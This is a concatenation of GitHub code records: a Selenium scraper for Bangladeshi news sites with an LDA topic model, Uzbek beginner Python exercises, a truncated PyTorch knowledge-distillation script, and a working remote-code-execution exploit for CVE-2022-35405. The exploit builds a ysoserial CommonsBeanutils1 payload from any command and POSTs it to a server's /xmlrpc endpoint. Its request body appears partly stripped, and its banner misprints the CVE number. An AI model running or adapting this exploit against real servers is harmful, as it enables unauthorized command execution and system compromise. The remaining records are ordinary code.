\"//a[@class='card-with-image-zoom'][@href]\")\n\n for j, element in enumerate(search_links[next_j:]):\n page_link = element.get_attribute(\"href\")\n print(f\"News number: {next_j + (j + 1)}\")\n\n # Scrap from news main function\n page_dict = scan_page_prothomalo(page_link, keep_content=keep_content)\n scrap_df.append(page_dict)\n\n # Go to next page\n try:\n next_j += j + 1\n # print(next_j)\n next_page_element = WebDriverWait(self.driver, 5).until(\n EC.visibility_of_element_located((By.XPATH, \"//span[text()='আরও']\")))\n self.driver.execute_script(\"return arguments[0].scrollIntoView(true);\", next_page_element)\n\n next_page = self.driver.find_element(By.XPATH, \"//span[text()='আরও']\")\n next_page.click()\n print(\"Next portion\")\n except:\n print(\"End of ProthomAlo search!\")\n break\n i += 1\n sleep(0.5)\n\n print(\"End of Prothomalo search!\")\n scrap_df = pd.DataFrame(scrap_df)\n return scrap_df\n\n def search_kalerkantho(self, pages=1, keep_content=False):\n print(\"Scraping from Kalerkantho\")\n self.driver.get(\n \"http://www.kalerkantho.com/\" + \"home/search?cx=partner-pub-0600503450204720%3A2337922458&cof=FORID%3A10&ie=UTF-8&q=\" + self.search_key)\n scrap_df = []\n i = 1\n while i <= pages:\n try:\n WebDriverWait(self.driver, 5).until(\n EC.presence_of_element_located((By.XPATH, \"//div[@class='gs-title']/a[@class ='gs-title'][@href]\")))\n print(\"Search results ready!!\")\n except TimeoutException:\n gsc_link = self.driver.find_elements(By.XPATH, \"//iframe[@name='googleSearchFrame']\")\n self.driver.get(gsc_link[0].get_attribute('src'))\n print(\"Timed out! Trying new approach\")\n search_links = self.driver.find_elements(By.XPATH, \"//div[@class='gs-title']/a[@class='gs-title'][@href]\")\n # print(search_links)\n j = 1\n for j, element in enumerate(search_links):\n page_link = element.get_attribute(\"href\")\n print(f\"News number: {(i - 1) * len(search_links) + (j + 1)}\")\n\n page_dict = scan_page_kaler_kantho(page_link, keep_content=keep_content)\n scrap_df.append(page_dict)\n # Go to next page\n try:\n next_page = self.driver.find_element(By.XPATH, \"//div[@class='gsc-cursor']\")\n next_page.find_element(By.XPATH, f\"//div[@aria-label='Page {i + 1}']\").click()\n except:\n print(\"End of KalerKantho search!\")\n break\n i += 1\n sleep(1)\n\n print(\"End of KalerKantho search!\")\n scrap_df = pd.DataFrame(scrap_df)\n return scrap_df\n\n def search_jaijaidin(self, pages=1, keep_content=False):\n print(\"Scraping from Jaijaidin\")\n self.driver.get(\n 'https://www.jaijaidinbd.com/search/google/?q=' + self.search_key + '&cx=partner-pub-5450504941871955%3A3787426415&cof=FORID%3A10&ie=UTF-8&sa=Search&sort=date')\n\n scrap_df = []\n i = 1\n while i <= pages:\n try:\n WebDriverWait(self.driver, 5).until(\n EC.presence_of_element_located((By.XPATH, \"//div[@class='gs-title']/a[@class ='gs-title'][@href]\")))\n print(\"Search results ready!!\")\n except TimeoutException:\n gsc_link = self.driver.find_elements(By.XPATH, \"//iframe[@name='googleSearchFrame']\")\n self.driver.get(gsc_link[0].get_attribute('src'))\n print(\"Timed out! Trying new approach\")\n search_links = self.driver.find_elements(By.XPATH, \"//div[@class='gs-title']/a[@class='gs-title'][@href]\")\n # print(search_links)\n j = 1\n for j, element in enumerate(search_links):\n page_link = element.get_attribute(\"href\")\n print(f\"News number: {(i - 1) * len(search_links) + (j + 1)}\")\n\n page_dict = scan_page_jaijaidin(page_link, keep_content=keep_content)\n scrap_df.append(page_dict)\n\n # Go to next page\n try:\n next_page = self.driver.find_element(By.XPATH, \"//div[@class='gsc-cursor']\")\n next_page.find_element(By.XPATH, f\"//div[@aria-label='Page {i + 1}']\").click()\n\n except:\n print(\"End of Jaijaidin search!\")\n break\n i += 1\n sleep(1)\n\n print(\"End of Jaijaidin search!\")\n scrap_df = pd.DataFrame(scrap_df)\n return scrap_df\n\n def search_inqilab(self, pages=1, keep_content=False):\n print(\"Scraping from INQILAB.\")\n self.driver.get('https://www.dailyinqilab.com/' + 'search?sq=' + 'এসিআই')\n\n scrap_df = []\n i = 1\n while i <= pages:\n try:\n WebDriverWait(self.driver, 2).until(\n EC.presence_of_element_located((By.XPATH, \"//div[@class='col-xs-12 col-sm-6']\")))\n print(\"Search results ready!!\")\n except TimeoutException:\n print(\"Timed out! News not collectable\")\n break\n search_links = self.driver.find_elements(By.XPATH, \"//div[@class='col-xs-12 col-sm-6']/a[@href]\")\n j = 1\n for j, element in enumerate(search_links):\n page_link = element.get_attribute(\"href\")\n print(f\"News number: {(i - 1) * len(search_links) + (j + 1)}\")\n\n page_dict = scan_page_inqilab(page_link, keep_content=keep_content)\n scrap_df.append(page_dict)\n\n # Go to next page\n try:\n next_page = self.driver.find_element(By.XPATH, \"//ul[@class='pagination']/li/a[text()='পরে »']\")\n self.driver.get(next_page.get_attribute(\"href\"))\n except:\n print(\"End of Inqilab search!\")\n break\n i += 1\n sleep(1)\n\n print(\"End of Inqilab search!\")\n scrap_df = pd.DataFrame(scrap_df)\n return scrap_df\n\n def search_jugantor(self, pages=1, keep_content=False):\n print(\"Scraping from Jugantor\")\n self.driver.get(\"https://www.jugantor.com/\" + \"search/google?q=\" + 'এসিআই')\n\n scrap_df = []\n i = 1\n while i <= pages:\n try:\n WebDriverWait(self.driver, 2).until(\n EC.presence_of_element_located((By.XPATH, \"//div[@class='gs-title']/a[@class ='gs-title'][@href]\")))\n print(\"Search results ready!!\")\n except TimeoutException:\n gsc_link = self.driver.find_elements(By.XPATH, \"//iframe[@name='googleSearchFrame']\")\n self.driver.get(gsc_link[0].get_attribute('src'))\n print(\"Timed out! Trying new approach\")\n search_links = self.driver.find_elements(By.XPATH, \"//div[@class='gs-title']/a[@class='gs-title'][@href]\")\n # print(search_links)\n j = 1\n for j, element in enumerate(search_links):\n page_link = element.get_attribute(\"href\")\n print(f\"News number: {(i - 1) * len(search_links) + (j + 1)}\")\n\n page_dict = scan_page_jugantor(page_link, keep_content=keep_content)\n scrap_df.append(page_dict)\n\n # Go to next page\n try:\n next_page = WebDriverWait(self.driver, 10).until(EC.element_to_be_clickable(\n (By.XPATH, f\"//div[@class='gsc-cursor']/div[@aria-label='Page {i + 1}']\")))\n next_page.click()\n\n except ElementClickInterceptedException:\n print(\"Element not visible due to ad\")\n next_page_element = WebDriverWait(self.driver, 5).until(EC.visibility_of_element_located(\n (By.XPATH, f\"//div[@class='gsc-cursor']/div[@aria-label='Page {i + 1}']\")))\n self.driver.execute_script(\"return arguments[0].scrollIntoView(true);\", next_page_element)\n self.driver.find_element(By.XPATH,\n f\"//div[@class='gsc-cursor']/div[@aria-label='Page {i + 1}']\").click()\n except:\n print(\"Scraping done!\")\n break\n i += 1\n sleep(3)\n\n print(\"End of Jugantor search!\")\n scrap_df = pd.DataFrame(scrap_df)\n return scrap_df\n\n def search_nayaDiganta(self, pages=1, keep_content=False):\n print(\"Scraping from Nayadiganta\")\n self.driver.get(\"https://www.dailynayadiganta.com/\" + \"search?q=\" + 'এসিআই')\n\n scrap_df = []\n i = 1\n while i <= pages:\n try:\n print(\"Searching...\")\n WebDriverWait(self.driver, 5).until(\n EC.presence_of_element_located((By.XPATH, \"//div[@class='gs-title']/a[@class ='gs-title'][@href]\")))\n print(\"search results ready!!\")\n except TimeoutException:\n print(\"Timed out!\")\n\n search_links = self.driver.find_elements(By.XPATH, \"//div[@class='gs-title']/a[@class='gs-title'][@href]\")\n # print(search_links)\n j = 1\n for j, element in enumerate(search_links):\n news_link = element.get_attribute(\"href\")\n print(f\"News number: {(i - 1) * len(search_links) + (j + 1)}\")\n page_link = news_link if 'ampproject' not in news_link else news_link.replace('/ampproject', '')\n\n page_dict = scan_page_nayadiganta(page_link, keep_content=keep_content)\n scrap_df.append(page_dict)\n\n # Go to next page\n try:\n print(i)\n next_page = WebDriverWait(self.driver, 10).until(EC.element_to_be_clickable(\n (By.XPATH, f\"//div[@class='gsc-cursor']/div[@aria-label='Page {i + 1}']\")))\n next_page.click()\n\n except ElementClickInterceptedException:\n print(\"Element not visible due to ad\")\n next_page_element = WebDriverWait(self.driver, 5).until(EC.visibility_of_element_located(\n (By.XPATH, f\"//div[@class='gsc-cursor']/div[@aria-label='Page {i + 1}']\")))\n self.driver.execute_script(\"return arguments[0].scrollIntoView(true);\", next_page_element)\n self.driver.find_element(By.XPATH,\n f\"//div[@class='gsc-cursor']/div[@aria-label='Page {i + 1}']\").click()\n except:\n print(\"Scraping done!\")\n break\n i += 1\n sleep(2)\n\n print(\"End of Jugantor search!\")\n scrap_df = pd.DataFrame(scrap_df)\n return scrap_df\n\n def search_mzamin(self, pages=1, keep_content=False):\n print(\"Scraping from Manabzamin\")\n self.driver.get(\"https://mzamin.com/\")\n\n while True:\n try:\n WebDriverWait(self.driver, 2).until(\n EC.element_to_be_clickable((By.XPATH, \"//i[@class='bi bi-search']\"))).click()\n except:\n print(\"Element not found. Refreshing.\")\n self.driver.refresh()\n continue\n try:\n WebDriverWait(self.driver, 2).until(\n EC.presence_of_element_located((By.XPATH, \"//input[@class='gsc-input']\")))\n except:\n print(\"Search dialog not visible.\")\n self.driver.refresh()\n continue\n try:\n WebDriverWait(self.driver, 2).until(\n EC.element_to_be_clickable((By.XPATH, \"//input[@class='gsc-input']\")))\n WebDriverWait(self.driver, 2).until(\n EC.element_to_be_clickable((By.XPATH, \"//input[@class='gsc-input']\"))).send_keys(\n self.search_key + Keys.RETURN)\n break\n except:\n print(\"Can't interact with element!\")\n self.driver.refresh()\n continue\n\n print(\"Showing search results\")\n action = AC(self.driver)\n scrap_df = []\n i = 1\n while i <= pages:\n print(f\"Page {i}\")\n action.send_keys(Keys.CONTROL + Keys.HOME)\n action.pause(1)\n action.perform()\n try:\n WebDriverWait(self.driver, 5).until(\n EC.presence_of_element_located((By.XPATH, \"//div[@class='gs-title']/a[@href][@class='gs-title']\")))\n print(\"search results ready!!\")\n except TimeoutException:\n print(\"Timed out!\")\n search_links = self.driver.find_elements(By.XPATH, \"//div[@class='gs-title']/a[@href][@class='gs-title']\")\n\n for j, element in enumerate(search_links):\n page_link = element.get_attribute(\"data-ctorig\")\n page_link = \"http://www.\" + page_link[page_link.find(\"mzamin.com\"):]\n # print(page_link)\n print(j + 1, page_link)\n\n page_dict = scan_page_mzamin(page_link, keep_content=True)\n scrap_df.append(page_dict)\n\n # Go to next page\n try:\n next_page_element = WebDriverWait(self.driver, 5).until(EC.visibility_of_element_located(\n (By.XPATH, f\"//div[@class='gsc-cursor']/div[@aria-label='Page {i + 1}']\")))\n self.driver.execute_script(\"return arguments[0].scrollIntoView(true);\", next_page_element)\n self.driver.find_element(By.XPATH,\n f\"//div[@class='gsc-cursor']/div[@aria-label='Page {i + 1}']\").click()\n print(\"Next Page click\")\n except TimeoutException:\n print(\"Timed out!\")\n break\n except:\n print(\"End of Manabzamin search.\")\n\n i += 1\n sleep(1)\n print(\"End of Manabzamin search!\")\n scrap_df = pd.DataFrame(scrap_df)\n return scrap_df\n\n def search_daily_star(self, pages=1, keep_content=False):\n print(\"Scraping from Daily Star\")\n self.driver.get('https://www.thedailystar.net' + '/search?t=' +\n self.search_key + '#gsc.tab=0&gsc.q=' + self.search_key + '&gsc.page=1')\n\n scrap_df = []\n i = 1\n while i <= pages:\n try:\n print(\"Searching...\")\n WebDriverWait(self.driver, 5).until(\n EC.presence_of_element_located((By.XPATH, \"//div[@class='gs-title']/a[@class ='gs-title'][@href]\")))\n print(\"Search results ready!!\")\n except TimeoutException:\n print(\"Timed out!\")\n\n search_links = self.driver.find_elements(By.XPATH, \"//div[@class='gs-title']/a[@class='gs-title'][@href]\")\n j = 1\n for j, element in enumerate(search_links):\n page_link = element.get_attribute(\"href\")\n print(f\"News number: {(i - 1) * len(search_links) + (j + 1)}\")\n\n page_dict = scan_page_daily_star(page_link, keep_content=keep_content)\n scrap_df.append(page_dict)\n\n # Go to next page\n try:\n print(i)\n next_page = WebDriverWait(self.driver, 10).until(EC.element_to_be_clickable(\n (By.XPATH, f\"//div[@class='gsc-cursor']/div[@aria-label='Page {i + 1}']\")))\n next_page.click()\n\n except ElementClickInterceptedException:\n print(\"Element not visible due to ad\")\n next_page_element = WebDriverWait(self.driver, 5).until(EC.visibility_of_element_located(\n (By.XPATH, f\"//div[@class='gsc-cursor']/div[@aria-label='Page {i + 1}']\")))\n self.driver.execute_script(\"return arguments[0].scrollIntoView(true);\", next_page_element)\n self.driver.find_element(By.XPATH,\n f\"//div[@class='gsc-cursor']/div[@aria-label='Page {i + 1}']\").click()\n except:\n print(\"Scraping done!\")\n break\n i += 1\n sleep(2)\n\n print(\"End of Daily Star search!\")\n scrap_df = pd.DataFrame(scrap_df)\n return scrap_df\n\n def search_dhaka_tribune(self, pages=1, keep_content=False):\n print(\"Scraping from Dhaka Tribune\")\n self.driver.get('https://www.dhakatribune.com' + '/search?q=' + self.search_key)\n\n scrap_df = []\n i = 1\n while i <= pages:\n try:\n print(\"Searching...\")\n WebDriverWait(self.driver, 10).until(\n EC.presence_of_element_located((By.XPATH, \"//div[@class='gs-title']/a[@class ='gs-title'][@href]\")))\n print(\"Search results ready!!\")\n except TimeoutException:\n print(\"Timed out!\")\n\n search_links = self.driver.find_elements(By.XPATH, \"//div[@class='gs-title']/a[@class='gs-title'][@href]\")\n j = 1\n for j, element in enumerate(search_links):\n page_link = element.get_attribute(\"href\")\n print(f\"News number: {(i - 1) * len(search_links) + (j + 1)}\")\n\n page_dict = scan_page_dhaka_tribune(page_link, keep_content=keep_content)\n scrap_df.append(page_dict)\n\n # Go to next page\n try:\n print(i)\n next_page = WebDriverWait(self.driver, 10).until(EC.element_to_be_clickable(\n (By.XPATH, f\"//div[@class='gsc-cursor']/div[@aria-label='Page {i + 1}']\")))\n next_page.click()\n\n except ElementClickInterceptedException:\n print(\"Element not visible due to ad\")\n next_page_element = WebDriverWait(self.driver, 5).until(EC.visibility_of_element_located(\n (By.XPATH, f\"//div[@class='gsc-cursor']/div[@aria-label='Page {i + 1}']\")))\n self.driver.execute_script(\"return arguments[0].scrollIntoView(true);\", next_page_element)\n self.driver.find_element(By.XPATH,\n f\"//div[@class='gsc-cursor']/div[@aria-label='Page {i + 1}']\").click()\n except:\n print(\"Scraping done!\")\n break\n i += 1\n sleep(2)\n\n print(\"End of Dhaka Tribune search!\")\n scrap_df = pd.DataFrame(scrap_df)\n return scrap_df\n\n def search_tbs(self, pages=1, keep_content=False):\n print(\"Scraping from The Business Standard\")\n self.driver.get(\"https://www.tbsnews.net/search\")\n\n while True:\n try:\n WebDriverWait(self.driver, 2).until(\n EC.presence_of_element_located((By.XPATH, \"//input[@class='gsc-input']\")))\n except:\n print(\"Search dialog not visible.\")\n self.driver.refresh()\n continue\n try:\n WebDriverWait(self.driver, 2).until(\n EC.element_to_be_clickable((By.XPATH, \"//input[@class='gsc-input']\")))\n WebDriverWait(self.driver, 2).until(\n EC.element_to_be_clickable((By.XPATH, \"//input[@class='gsc-input']\"))).send_keys(\n self.search_key + Keys.RETURN)\n break\n except:\n print(\"Can't interact with element!\")\n self.driver.refresh()\n continue\n\n scrap_df = []\n i = 1\n while i <= pages:\n try:\n print(\"Searching...\")\n WebDriverWait(self.driver, 5).until(\n EC.presence_of_element_located((By.XPATH, \"//div[@class='gs-title']/a[@class ='gs-title'][@href]\")))\n print(\"Search results ready!!\")\n except TimeoutException:\n print(\"Timed out!\")\n\n search_links = self.driver.find_elements(By.XPATH, \"//div[@class='gs-title']/a[@class='gs-title'][@href]\")\n j = 1\n for j, element in enumerate(search_links):\n page_link = element.get_attribute(\"href\")\n print(f\"News number: {(i - 1) * len(search_links) + (j + 1)}\")\n\n page_dict = scan_page_tbs(page_link, keep_content=keep_content)\n scrap_df.append(page_dict)\n\n # Go to next page\n try:\n print(i)\n next_page = WebDriverWait(self.driver, 10).until(EC.element_to_be_clickable(\n (By.XPATH, f\"//div[@class='gsc-cursor']/div[@aria-label='Page {i + 1}']\")))\n next_page.click()\n\n except ElementClickInterceptedException:\n print(\"Element not visible due to ad\")\n next_page_element = WebDriverWait(self.driver, 5).until(EC.visibility_of_element_located(\n (By.XPATH, f\"//div[@class='gsc-cursor']/div[@aria-label='Page {i + 1}']\")))\n self.driver.execute_script(\"return arguments[0].scrollIntoView(true);\", next_page_element)\n self.driver.find_element(By.XPATH,\n f\"//div[@class='gsc-cursor']/div[@aria-label='Page {i + 1}']\").click()\n except:\n print(\"Scraping done!\")\n break\n i += 1\n sleep(2)\n\n print(\"End of The Business Standard search!\")\n scrap_df = pd.DataFrame(scrap_df)\n return scrap_df\n\n def search_fin_exp(self, pages=1, keep_content=False):\n print(\"Scraping from The Financial Express\")\n self.driver.get(\"https://thefinancialexpress.com.bd/\" + \"search?term=news&query=\" + self.search_key + \"&page=1\")\n\n while True:\n try:\n WebDriverWait(self.driver, 2).until(\n EC.presence_of_element_located((By.XPATH, \"//input[@class='gsc-input']\")))\n except:\n print(\"Search dialog not visible.\")\n self.driver.refresh()\n continue\n try:\n WebDriverWait(self.driver, 2).until(\n EC.element_to_be_clickable((By.XPATH, \"//input[@class='gsc-input']\")))\n WebDriverWait(self.driver, 2).until(\n EC.element_to_be_clickable((By.XPATH, \"//input[@class='gsc-input']\"))).send_keys(\n self.search_key + Keys.RETURN)\n break\n except:\n print(\"Can't interact with element!\")\n self.driver.refresh()\n continue\n\n scrap_df = []\n i = 1\n while i <= pages:\n try:\n print(\"Searching...\")\n WebDriverWait(self.driver, 5).until(\n EC.presence_of_element_located((By.XPATH, \"//div[@class='gs-title']/a[@class ='gs-title'][@href]\")))\n print(\"Search results ready!!\")\n except TimeoutException:\n print(\"Timed out!\")\n\n search_links = self.driver.find_elements(By.XPATH, \"//div[@class='gs-title']/a[@class='gs-title'][@href]\")\n j = 1\n for j, element in enumerate(search_links):\n page_link = element.get_attribute(\"href\")\n print(f\"News number: {(i - 1) * len(search_links) + (j + 1)}\")\n\n page_dict = scan_page_tbs(page_link, keep_content=keep_content)\n scrap_df.append(page_dict)\n\n # Go to next page\n try:\n print(i)\n next_page = WebDriverWait(self.driver, 10).until(EC.element_to_be_clickable(\n (By.XPATH, f\"//div[@class='gsc-cursor']/div[@aria-label='Page {i + 1}']\")))\n next_page.click()\n\n except ElementClickInterceptedException:\n print(\"Element not visible due to ad\")\n next_page_element = WebDriverWait(self.driver, 5).until(EC.visibility_of_element_located(\n (By.XPATH, f\"//div[@class='gsc-cursor']/div[@aria-label='Page {i + 1}']\")))\n self.driver.execute_script(\"return arguments[0].scrollIntoView(true);\", next_page_element)\n self.driver.find_element(By.XPATH,\n f\"//div[@class='gsc-cursor']/div[@aria-label='Page {i + 1}']\").click()\n except:\n print(\"Scraping done!\")\n break\n i += 1\n sleep(2)\n\n print(\"End of The Business Standard search!\")\n scrap_df = pd.DataFrame(scrap_df)\n return scrap_df\n\n\nclass TopicModel():\n stop_words = stopwords.words('english')\n stop_words.extend(\n ['from', 'subject', 're', 'edu', 'use', 'not', 'would', 'say', 'could', '_', 'be', 'know', 'good', 'go', 'get',\n 'do', 'done', 'try', 'many', 'some', 'nice', 'thank', 'think', 'see', 'rather', 'easy', 'easily', 'lot',\n 'lack', 'make', 'want', 'seem', 'run', 'need', 'even', 'right', 'line', 'even', 'also', 'may', 'take', 'come',\n 'aci'])\n\n\n def sentence_to_words(self,sentences):\n for sent in sentences:\n sent = re.sub('\\S*@\\S*\\s?', '', sent) # remove emails\n sent = re.sub('\\s+', ' ', sent) # remove newline chars\n sent = re.sub(\"\\'\", \"\", sent) # remove single quotes\n sent = gensim.utils.simple_preprocess(str(sent), deacc=True)\n yield (sent)\n\n def process_words(self, texts, stop_words=stop_words, allowed_postags=['NOUN', 'ADJ', 'VERB', 'ADV']):\n data_words = self.sentence_to_words(texts)\n bigram = gensim.models.Phrases(data_words, min_count=5, threshold=100) # higher threshold fewer phrases.\n trigram = gensim.models.Phrases(bigram[data_words], threshold=100)\n bigram_mod = gensim.models.phrases.Phraser(bigram)\n trigram_mod = gensim.models.phrases.Phraser(trigram)\n\n texts = [[word for word in simple_preprocess(str(doc)) if word not in stop_words] for doc in texts]\n texts = [bigram_mod[doc] for doc in texts]\n texts = [trigram_mod[bigram_mod[doc]] for doc in texts]\n # texts_out = []\n # nlp = spacy.load('en', disable=['parser', 'ner'])\n # for sent in texts:\n # doc = nlp(\" \".join(sent))\n # texts_out.append([token.lemma_ for token in doc if token.pos_ in allowed_postags])\n # remove stopwords once more after lemmatization\n\n # texts_out = [[word for word in simple_preprocess(str(doc)) if word not in stop_words] for doc in texts_out]\n return texts\n\n def make_topic_model(self,data_ready):\n id2word = corpora.Dictionary(data_ready)\n corpus = [id2word.doc2bow(text) for text in data_ready]\n\n # Build LDA model\n lda_model = gensim.models.ldamodel.LdaModel(corpus=corpus,\n id2word=id2word,\n num_topics=4,\n random_state=100,\n update_every=1,\n chunksize=10,\n passes=10,\n alpha='symmetric',\n iterations=100,\n per_word_topics=True)\n\n # pprint(lda_model.print_topics())\n vis = pyLDAvis.gensim_models.prepare(lda_model, corpus, dictionary=lda_model.id2word)\n\n return lda_model, vis","repo_name":"Minhaz034/BD-newspaper-scrapper","sub_path":"scraputil.py","file_name":"scraputil.py","file_ext":"py","file_size_in_byte":61053,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"22742437185","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 13 15:52:34 2023\n\n@author: pc\n\"\"\"\n#Foydalanuvchidan juft son kiritishni so'rang. Agar foydalanuvchi juft son kiritsa\n# \"Rahmat!\", agar toq son kiritsa \"Bu son juft emas\" degan xabarni chiqaring.\n\nson = float(input(\"Juft son kiriting. \\n> \"))\nif son%2:\n print(\"Bu juft son emas.\")\nelse:\n print(\"Rahmat.\")\n \n#Foydalanuvchi yoshini so'rang, va muzeyga kirish uchun chipta narhini chiqaring:\n#yosh = int(input(\"Iltimos, yoshingizni kiriting. \\n> \"))\n#if yosh <= 4 or yosh >= 60:\n# print(\"Sizga muzeyga kirish bepul. Marhamat!\")\n#elif yosh <= 18:\n# print(\"Muzeyga kirish bileti narxi 10000 so'm\")\n#else:\n# print(\"Muzeyga kirish bileti narxi 20000 so'm\")\n \n# yoki:\n#yosh = int(input(\"Yoshingiz nechida?\"))\n\n#if yosh<=4 or yosh>=60:\n# narh = 0;\n#elif yosh < 18:\n# narh = 10000\n#else:\n# narh = 20000\n#print(f\"Chipta {narh} so'm\") \n \n# Foydalanuvchidan ikita son kiritishni so'rang, sonlarni solishtiring va ularning\n# teng yoki katta/kichikligi haqida xabarni chiqaring:\n \n#son_1 = float(input(\"Istalgan sonni kiriting. \\n> \"))\n#son_2 = float(input(\"Istalgan yana bir sonni kiriting. \\n> \"))\n#if son_1 > son_2:\n# print(f\"{son_1} > {son_2}\")\n#elif son_1 < son_2:\n# print(f\"{son_1} < {son_2}\")\n#else:\n# print(f\"{son_1} = {son_2}\")\n \n# \n#mahsulotlar = [\"kartoshka\", \"piyoz\", \"sabzi\", \"anor\", \"anjir\", \"o'rik\", \"uzum\",\n # \"shaftoli\", \"tarvuz\", \"qovun\"]\n#savat = []\n#for meva in range(5):\n# savat.append(input(f\"Savatga {meva+1}-mahsulotni kiriting. \\n> \"))\n#for meva in savat:\n# if meva in mahsulotlar:\n# print(f\"Do'konimizda {meva} bor\")\n# else:\n# print(f\"Do'konimizda {meva} yo'q\")\n\n#iphone = [\"Iphone XS\", \"Iphone X\", \"Iphone 12\", \"Iphone 12 Pro\", \"Iphone 13 Pro Max,\",\n# \"Iphone 7\", \"Iphone 8\", \"Iphone 14 Pro Max\"]\n#order = []\n#for model in range(6):\n# order.append(input(f\"Harid qilmoqchi bo'lgan {model+1}-telefon modelini kiriting.\\n> \"))\n#for model in order:\n# if model in iphone:\n# print(f\"Bizda {model} modeli mavjud.\")\n# else:\n# print(f\"Bizda {model} modeli mavjud emas.\")\n \n# foydalanuvchilar degan ro'yxat tuzing, va kamida 5 ta login qo'shing. \n#Foydalanuvchidan yangi login tanlashni so'rang va foydalanuvchi kiritgan loginni\n# foydalanuvchilar degan ro'yxatning tarkibi bilan solishtiring. Agar ro'yxatda \n#bunday login mavjud bo'lsa, \"Login band, yangi login tanlang!\" aks holda \n#\"Xush kelibsiz, foydalanuvchi!\" xabarini chiqaring.\n\nfoydalanuvchilar = [\"omadbek\",\"alisher\", \"elmurod\",\"laziz\",\"qudrat\",\"nuriddin\"]\nyangi_foydalanuvchi = []\nyangi_foydalanuvchi.append(input(\"Iltimos yangi login kiriting. \\n> \"))\nfor new in yangi_foydalanuvchi:\n if new in foydalanuvchilar:\n print(\"Kechirasiz, login band. Yangi login tanlang.\")\n else:\n print(\"Hush kelibsiz!\")\n\n# Boshqa bir usul:\n\nusers = [\"omadbek\", \"javlon\", \"alisher\", \"bunyod\"]\nlogin = input(\"Iltimos, yangi login tanlang. \\n> \")\nif login in users:\n print(\"Login band. Iltimos boshqa login tanlang.\")\nelse:\n print(\"Hush kelibsiz!\")\n\n\n\n\n\n\n#mahsulotlar = [\"kartoshka\", \"piyoz\", \"sabzi\", \"anor\", \"anjir\", \"o'rik\", \"uzum\",\n# \"shaftoli\", \"tarvuz\", \"qovun\"]\n#buyurtma = []\n#for meva in range(5):\n#if buyurtma:\n \n \n \n \n \n \n \n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n ","repo_name":"Omadbekdev/pyhton-lessons","sub_path":"lesson-9_(mashqlar)_bir_necha_shartlarni_tek_(9).py","file_name":"lesson-9_(mashqlar)_bir_necha_shartlarni_tek_(9).py","file_ext":"py","file_size_in_byte":3454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39867525943","text":"import requests\nimport os\nimport argparse\n\nprint('CVE-2022-33405 - Engines RCE exploit :)')\nparser = argparse.ArgumentParser(description='')\nparser.add_argument('-u', '--url', help='URL of the server', required=True)\nparser.add_argument('-p', '--port', help='Port of the server', required=True)\nparser.add_argument('-j', '--jar', help='Path to the YSoserial jar', required=True)\nparser.add_argument('-c', '--command', help='Command to execute on server', required=True)\n\nargs = parser.parse_args()\nurl = args.url\nif url[-1:] == '/':\n url = url[:-1]\nport = args.port\njar = args.jar\ncommand_payload = args.command\n\nrequests.packages.urllib3.disable_warnings()\n\ndef ysoserial(command_payload, jar):\n o = os.popen(f'java -jar {jar} CommonsBeanutils1 \"{command_payload}\" | base64 | tr -d \"\\\\n\"').read()\n print(f'[+] Payload: {o}')\n return o\n \ndef make_request(url, port, ysoserial_payload):\n url = f\"{url}:{port}/xmlrpc\"\n headers = {\"Connection\": \"close\", \"Content-Type\": \"application/xml\"}\n data = f'big0ustest{ysoserial_payload}'\n r = requests.post(url, headers=headers, data=data, verify=False)\n if 'java.lang.reflect.InvocationTargetException' in r.text:\n print(f'[+] Successfully executed command')\n else:\n print(f'[-] Failed to execute command')\n print(f'[-] Response: {r.text}')\n\nprint(f'[+] Command: {command_payload}')\nysoserial_payload = ysoserial(command_payload, jar)\nmake_request(url, port, ysoserial_payload)\n","repo_name":"viniciuspereiras/CVE-2022-35405","sub_path":"CVE-2022-35405.py","file_name":"CVE-2022-35405.py","file_ext":"py","file_size_in_byte":1727,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"61"} +{"seq_id":"42588068136","text":"from typing import Any\nfrom pytorch_lightning.utilities.types import EVAL_DATALOADERS\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torchvision\nimport torchvision.transforms as transforms\nimport pytorch_lightning as pl\nimport torchmetrics\nfrom lightning.pytorch.accelerators import find_usable_cuda_devices\nfrom torch.optim.lr_scheduler import StepLR\n\nbatch_size = 2\n\nclass TeacherNet(nn.Module):\n def __init__(self):\n super().__init__()\n self.fc1 = nn.Linear(784, 256)\n self.fc2 = nn.Linear(256, 10)\n \n def forward(self, x):\n x = x.view(x.size(0), -1)\n x = torch.relu(self.fc1(x))\n x = self.fc2(x)\n return x\n\nclass StudentNet(nn.Module):\n def __init__(self):\n super().__init__()\n self.fc1 = nn.Linear(784, 256)\n self.fc2 = nn.Linear(256, 10)\n \n def forward(self, x):\n x = x.view(x.size(0), -1)\n x = torch.relu(self.fc1(x))\n x = self.fc2(x)\n return x\n\nclass KnowledgeDistillation(pl.LightningModule):\n def __init__(self, teacher, student, T=20, alpha=0.5):\n super().__init__()\n self.teacher = teacher\n self.student = student\n self.T = T\n self.alpha = alpha\n self.ce_loss = nn.CrossEntropyLoss()\n \n def forward(self, x):\n return self.student(x)\n \n def training_step(self, batch, batch_idx):\n x, y = batch\n teacher_outputs = self.teacher(x) / self.T\n student_outputs = self.student(x) / self.T\n \n ce_loss = self.ce_loss(student_outputs, y)\n kd_loss = nn.KLDivLoss()(torch.log_softmax(student_outputs, dim=1), torch.softmax(teacher_outputs, dim=1))\n loss = (1 - self.alpha) * ce_loss + self.alpha * self.T * self.T * kd_loss\n \n self.log(\"train_loss\", loss, on_step=True, on_epoch=True, prog_bar=True, logger=True)\n return loss\n \n def validation_step(self, batch, batch_idx):\n x, y = batch\n y_hat = self.student(x)\n acc = torchmetrics.functional.accuracy(y_hat, y)\n acc=0\n self.log(\"val_acc\", acc)\n return acc\n \n def configure_optimizers(self):\n optimizer = optim.Adam(self.student.parameters(), lr=1e-3)\n #scheduler = StepLR(optimizer, step_size=1000, gamma=0.1)\n return optimizer\n \n def train_dataloader(self):\n train_dataset = torchvision.datasets.MNIST(root='./data', \n train=True, \n transform=transforms.ToTensor(), \n download=True)\n train_loader = torch.utils.data.DataLoader(dataset=train_dataset, \n batch_size=batch_size, \n shuffle=True,\n num_workers=4)\n return train_loader\n \n def val_dataloader(self):\n val_dataset = 